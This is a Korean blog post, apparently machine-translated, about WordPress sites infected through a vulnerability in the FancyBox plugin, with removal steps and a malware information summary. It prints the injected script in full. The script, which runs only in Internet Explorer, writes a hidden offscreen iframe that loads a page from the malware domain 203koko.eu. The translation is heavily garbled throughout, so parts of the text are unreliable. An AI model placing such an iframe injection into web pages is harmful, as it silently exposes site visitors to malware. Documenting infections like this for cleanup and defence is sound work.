웹 사이트와 블로그의 이번 주 초 수 WordPress,에서 경고를 받았습니다. 악성 코드 감염 통해 구글 웹 마스터.
문제가 구글 웹 마스터 언급하는 것은 존재이며 코드 / 스크립트 iframe 멀웨어 소스 웹 페이지.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>
그것이 인 것 같다 취약점 a 플러그인acquis 팬시박스 WordPress 이는 어제 (05.02.2015)가 오랫동안 업데이트되지 때까지.
이 문제를 해결하고 손상된 부위를 소독 이 악성 코드는 비교적 간단합니다.
1. FancyBox 플러그인을 비활성화합니다.
2. FTP를 통해 모든 FancyBox 플러그인 파일을 서버에서 삭제하십시오.
3. 새 버전의 플러그인 (Fancybox 3.0.4)
팬시박스 WordPress 3.0.4
- 3.0.3에서 언급한 보안 문제의 영향을 받는 설정의 이름을 변경했습니다. 이렇게 하면 플러그인이 있는 사이트에 악성 코드가 표시되지 않습니다. updated 악성 코드를 제거하지 않고.
팬시박스 WordPress 3.0.3
- 보안 문제를 해결.
멀웨어 정보 :
TYPE : Iframe에 리디렉션
TARGET: WordPress 팬시 박스
악성 코드 DOMAIN : 203koko.eu
악성 코드 URI : http://203koko.eu/hjnfh/ipframe2.php
악성 코드 RAW 코드:
멀웨어 작성 : if (navigator.userAgent.match(/msie/i)) { document.write(‘
귀하의 악성 코드를 제거 WordPress 웹 사이트.